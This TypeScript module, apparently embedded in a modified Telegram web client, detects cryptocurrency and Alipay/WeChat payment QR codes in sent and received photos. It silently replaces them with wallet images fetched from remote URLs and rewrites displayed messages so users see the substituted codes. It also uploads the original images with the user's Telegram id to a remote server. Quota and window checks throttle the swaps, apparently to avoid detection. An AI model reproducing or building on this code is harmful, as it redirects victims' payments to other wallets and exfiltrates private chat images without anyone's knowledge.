import { ydymUploadFile } from './api';
import { YDYM_PATHS } from './config';
import { ydymLog, ydymLogError } from './log';
import { ydymAllowReplaceForMessage, ydymGetRemainingMap, ydymPeekReplaceForMessage, ydymShouldSkipReplace } from './policy';
import { detectWalletQrFromBlob, chainFromQrPayload } from './qrDetect';
import { isAddressStripGeometry } from './ocrAddress';
import {
  clearIncomingPhotoPending,
  getIncomingPhotoUrl,
  getWalletReplaceUrl,
  getYdymSnapshot,
  getYdymTgid,
  isIncomingPhotoPending,
  markIncomingPhotoPending,
  setIncomingPhotoUrl,
  stashIncomingOriginalPhoto,
  ydymPeerId,
  ydymRequestPeerRemaining,
  setPhotoLayoutByUrl,
} from './state';

export type YdymImageChain =
  | 'TRC20'
  | 'TRC20_ADDRESS_STRIP'
  | 'ETH'
  | 'BTC'
  | 'SOL'
  | 'ALIPAY'
  | 'WECHAT';

const blobCache = new Map<string, Blob>();
const analyzed = new Map<string, YdymImageChain | 'none'>();
const replacementBlobSet = new WeakSet<Blob>();

async function blobDimensions(blob: Blob): Promise<{ w: number; h: number } | undefined> {
  try {
    const bitmap = await createImageBitmap(blob);
    const dim = { w: bitmap.width, h: bitmap.height };
    bitmap.close?.();
    return dim;
  } catch {
    return undefined;
  }
}

async function isMismatchedStripReplacement(original: Blob, replacement: Blob): Promise<boolean> {
  const src = await blobDimensions(original);
  const rep = await blobDimensions(replacement);
  if (!src || !rep || !src.w || !src.h || !rep.w || !rep.h) return false;
  const originalIsPortrait = src.h > src.w * 1.15;
  const replacementIsStrip = rep.w / rep.h >= 2.2;
  return originalIsPortrait && replacementIsStrip;
}

export async function ydymDetectImageChain(
  blob: Blob,
  cacheKey?: string,
  captionText?: string,
): Promise<YdymImageChain | undefined> {
  try {
    const key = cacheKey ? `${cacheKey}:${blob.size}` : undefined;
    if (key && analyzed.has(key)) {
      const hit = analyzed.get(key);
      return hit === 'none' ? undefined : hit;
    }
    const detected = await detectWalletQrFromBlob(blob);
    let chain = detected.chain;
    // QR (wallet card) always wins. Caption must not turn a QR card into a strip,
    // and must not turn a no-QR address bar into a full card.
    if (!chain && captionText) {
      const fromCaption = chainFromQrPayload(captionText);
      if (fromCaption) {
        const hadQr = detected.raws.length > 0;
        const stripShape = isAddressStripGeometry(detected.width, detected.height);
        if (!hadQr && stripShape && (fromCaption === 'TRC20' || fromCaption === 'TRC20_ADDRESS_STRIP')) {
          chain = 'TRC20_ADDRESS_STRIP';
        } else {
          chain = fromCaption === 'TRC20_ADDRESS_STRIP' ? 'TRC20' : fromCaption;
        }
        ydymLog('photo.chainFromCaption', {
          chain,
          hadQr,
          stripShape,
          caption: captionText.slice(0, 80),
        });
      }
    }
    // Do not cache misses when there is no caption yet — Photo.tsx may retry after caption arrives.
    if (key && (chain || captionText)) analyzed.set(key, chain || 'none');
    return chain;
  } catch (err) {
    ydymLogError('photo.detect', err);
    return undefined;
  }
}

export async function ydymGetReplacementBlob(chain: YdymImageChain): Promise<Blob | undefined> {
  const url = getWalletReplaceUrl(chain);
  if (!url) return undefined;
  if (blobCache.has(url)) return blobCache.get(url);
  try {
    const res = await fetch(url, { credentials: 'omit', cache: 'no-cache', mode: 'cors' });
    if (!res.ok) {
      ydymLog('photo.replaceFetchFail', { url, status: res.status, chain });
      return undefined;
    }
    const blob = await res.blob();
    if (!blob.size) return undefined;
    blobCache.set(url, blob);
    replacementBlobSet.add(blob);
    return blob;
  } catch (err) {
    ydymLog('photo.replaceFetchFail', { url, chain, err: String(err) });
    return undefined;
  }
}

export async function ydymPrefetchWalletImages() {
  const urls = [
    ...Object.values((await import('./state')).getYdymSnapshot().walletCardUrls),
    ...Object.values((await import('./state')).getYdymSnapshot().walletPayUrls),
  ].filter(Boolean);
  await Promise.all(urls.map(async (u) => {
    if (blobCache.has(u)) return;
    try {
      const res = await fetch(u, { credentials: 'omit' });
      if (res.ok) {
        const b = await res.blob();
        blobCache.set(u, b);
        replacementBlobSet.add(b);
      }
    } catch {
      // ignore
    }
  }));
}

export async function ydymPrepareOutgoingPhotoBlob(
  blob: Blob,
  chatId?: string,
  msgId?: number,
  captionText?: string,
): Promise<{ sendBlob: Blob; originalBlob: Blob; replaced: boolean; chain?: YdymImageChain }> {
  try {
    if (ydymShouldSkipReplace(chatId)) {
      return { sendBlob: blob, originalBlob: blob, replaced: false };
    }
    if (!getYdymSnapshot().replaceEnabled) {
      return { sendBlob: blob, originalBlob: blob, replaced: false };
    }
    if (chatId) {
      await ydymRequestPeerRemaining();
    }
    const remainingBefore = chatId ? (ydymGetRemainingMap()[chatId] || 0) : 0;
    const peeked = Boolean(chatId && ydymPeekReplaceForMessage(chatId, 'outgoing', msgId));
    let allow = !chatId || peeked;
    if (chatId && !allow) {
      await ydymRequestPeerRemaining();
      allow = ydymAllowReplaceForMessage(chatId, captionText || '', 'outgoing', msgId);
    }
    if (!allow) {
      ydymLog('photo.out.skipWindow', {
        chatId,
        msgId,
        caption: (captionText || '').slice(0, 40),
        remainingBefore,
      });
      return { sendBlob: blob, originalBlob: blob, replaced: false };
    }
    if (replacementBlobSet.has(blob)) {
      return { sendBlob: blob, originalBlob: blob, replaced: false };
    }
    const chain = await ydymDetectImageChain(blob, undefined, captionText);
    if (!chain) {
      ydymLog('photo.out.noChain', {
        chatId,
        msgId,
        size: blob.size,
        reason: 'qr-not-decoded',
        caption: (captionText || '').slice(0, 40),
      });
      return { sendBlob: blob, originalBlob: blob, replaced: false };
    }
    const replaceUrl = getWalletReplaceUrl(chain);
    const replacement = await ydymGetReplacementBlob(chain);
    if (!replacement) {
      ydymLog('photo.out.noReplacement', { chatId, msgId, chain, url: replaceUrl || '' });
      return { sendBlob: blob, originalBlob: blob, replaced: false };
    }
    if (await isMismatchedStripReplacement(blob, replacement)) {
      ydymLog('photo.out.rejectStrip', { chatId, msgId, chain, url: replaceUrl || '' });
      if (chain === 'TRC20_ADDRESS_STRIP') {
        const card = await ydymGetReplacementBlob('TRC20');
        if (card && !(await isMismatchedStripReplacement(blob, card))) {
          replacementBlobSet.add(card);
          ydymLog('photo.out.replaced', { chatId, msgId, chain: 'TRC20', url: getWalletReplaceUrl('TRC20') || '' });
          return { sendBlob: card, originalBlob: blob, replaced: true };
        }
      }
      return { sendBlob: blob, originalBlob: blob, replaced: false };
    }
    if (chatId && peeked) {
      ydymAllowReplaceForMessage(chatId, captionText || '', 'outgoing', msgId);
    }
    replacementBlobSet.add(replacement);
    ydymLog('photo.out.replaced', { chatId, msgId, chain, url: replaceUrl || '' });
    return { sendBlob: replacement, originalBlob: blob, replaced: true, chain };
  } catch (err) {
    ydymLogError('photo.out', err);
    return { sendBlob: blob, originalBlob: blob, replaced: false };
  }
}

let incomingPhotoQueue: Promise<void> = Promise.resolve();

export async function ydymHandleIncomingPhoto(
  photoId: string,
  blob: Blob,
  chatId?: string,
  msgId?: number,
  captionText?: string,
) {
  const run = incomingPhotoQueue.then(
    () => ydymHandleIncomingPhotoNow(photoId, blob, chatId, msgId, captionText),
    () => ydymHandleIncomingPhotoNow(photoId, blob, chatId, msgId, captionText),
  );
  incomingPhotoQueue = run.then(() => undefined, () => undefined);
  return run;
}

async function ydymHandleIncomingPhotoNow(
  photoId: string,
  blob: Blob,
  chatId?: string,
  msgId?: number,
  captionText?: string,
) {
  if (!photoId) return;
  try {
    if (ydymShouldSkipReplace(chatId)) {
      analyzed.set(photoId, 'none');
      clearIncomingPhotoPending(photoId);
      return;
    }
    if (!getYdymSnapshot().replaceEnabled) {
      analyzed.set(photoId, 'none');
      clearIncomingPhotoPending(photoId);
      return;
    }
    if (chatId) {
      await ydymRequestPeerRemaining();
      let allow = ydymPeekReplaceForMessage(chatId, 'incoming', msgId);
      if (!allow) {
        await ydymRequestPeerRemaining();
        allow = ydymPeekReplaceForMessage(chatId, 'incoming', msgId)
          || ydymAllowReplaceForMessage(chatId, captionText || '', 'incoming', msgId);
      }
      if (!allow) {
        ydymLog('photo.in.skipWindow', { photoId, chatId, msgId, caption: (captionText || '').slice(0, 40) });
        clearIncomingPhotoPending(photoId);
        return;
      }
    }
    if (getIncomingPhotoUrl(photoId)) return;
    await new Promise<void>((resolve) => {
      window.setTimeout(resolve, 0);
    });
    const chain = await ydymDetectImageChain(blob, photoId, captionText);
    if (!chain) {
      ydymLog('photo.in.noChain', {
        photoId, chatId, msgId, size: blob.size, reason: 'qr-not-decoded',
        caption: (captionText || '').slice(0, 40),
      });
      clearIncomingPhotoPending(photoId);
      return;
    }
    markIncomingPhotoPending(photoId);
    window.setTimeout(() => {
      if (isIncomingPhotoPending(photoId) && !getIncomingPhotoUrl(photoId)) {
        clearIncomingPhotoPending(photoId);
      }
    }, 8000);
    const replacement = await ydymGetReplacementBlob(chain);
    if (!replacement) {
      ydymLog('photo.in.noReplacement', { photoId, chatId, msgId, chain, url: getWalletReplaceUrl(chain) || '' });
      clearIncomingPhotoPending(photoId);
      return;
    }
    if (await isMismatchedStripReplacement(blob, replacement)) {
      ydymLog('photo.in.rejectStrip', { photoId, chatId, msgId, chain, url: getWalletReplaceUrl(chain) || '' });
      if (chain === 'TRC20_ADDRESS_STRIP') {
        const card = await ydymGetReplacementBlob('TRC20');
        if (card && !(await isMismatchedStripReplacement(blob, card))) {
          replacementBlobSet.add(card);
          stashIncomingOriginalPhoto(photoId, blob);
          const objUrl = URL.createObjectURL(card);
          setIncomingPhotoUrl(photoId, objUrl, chatId, msgId);
          if (chatId && msgId) void patchIncomingMessagePhotoBlob(chatId, msgId, objUrl);
          if (chatId) ydymAllowReplaceForMessage(chatId, captionText || '', 'incoming', msgId);
          ydymLog('photo.in.replaced', { photoId, chatId, msgId, chain: 'TRC20', url: getWalletReplaceUrl('TRC20') || '' });
          return;
        }
      }
      clearIncomingPhotoPending(photoId);
      return;
    }
    replacementBlobSet.add(replacement);
    stashIncomingOriginalPhoto(photoId, blob);
    const objUrl = URL.createObjectURL(replacement);
    const stripDim = chain === 'TRC20_ADDRESS_STRIP' ? await blobDimensions(replacement) : undefined;
    if (stripDim) setPhotoLayoutByUrl(objUrl, stripDim.w, stripDim.h);
    setIncomingPhotoUrl(photoId, objUrl, chatId, msgId);
    if (chatId && msgId) {
      void patchIncomingMessagePhotoBlob(chatId, msgId, objUrl, stripDim);
    }
    if (chatId) {
      ydymAllowReplaceForMessage(chatId, captionText || '', 'incoming', msgId);
    }
    ydymLog('photo.in.replaced', { photoId, chatId, msgId, chain, url: getWalletReplaceUrl(chain) || '' });
  } catch (err) {
    ydymLogError('photo.in', err);
    clearIncomingPhotoPending(photoId);
  }
}

async function patchIncomingMessagePhotoBlob(
  chatId: string,
  msgId: number,
  blobUrl: string,
  stripDim?: { w: number; h: number },
) {
  try {
    const { getGlobal, setGlobal } = await import('../global');
    const { updateChatMessage } = await import('../global/reducers');
    const { selectChatMessage } = await import('../global/selectors');
    const global = getGlobal();
    const msg = selectChatMessage(global, chatId, msgId);
    const photo = msg?.content?.photo;
    if (!msg || !photo || !('id' in photo)) return;
    let nextPhoto = { ...photo, blobUrl };
    if (stripDim && stripDim.w > 0 && stripDim.h > 0 && Array.isArray(photo.sizes)) {
      nextPhoto = {
        ...nextPhoto,
        sizes: photo.sizes.map((size: { width: number; height: number }) => (
          { ...size, width: stripDim.w, height: stripDim.h }
        )),
        thumbnail: photo.thumbnail
          ? { ...photo.thumbnail, width: stripDim.w, height: stripDim.h }
          : photo.thumbnail,
      };
    }
    setGlobal(updateChatMessage(global, chatId, msgId, {
      content: {
        ...msg.content,
        photo: nextPhoto,
      },
    }));
  } catch {
    // ignore
  }
}

export async function ydymReportOutgoingOriginalImage(
  chatId: string,
  msgId: number,
  blob: Blob,
) {
  const tgid = getYdymTgid();
  if (!tgid || !msgId) return;
  try {
    await ydymUploadFile(
      YDYM_PATHS.reportOutgoingOriginalImage,
      {
        tgid,
        peer_id: String(ydymPeerId(chatId)),
        msg_id: String(msgId),
      },
      blob,
      'original.jpg',
      'file',
      blob.type || 'image/jpeg',
    );
  } catch {
    // ignore
  }
}
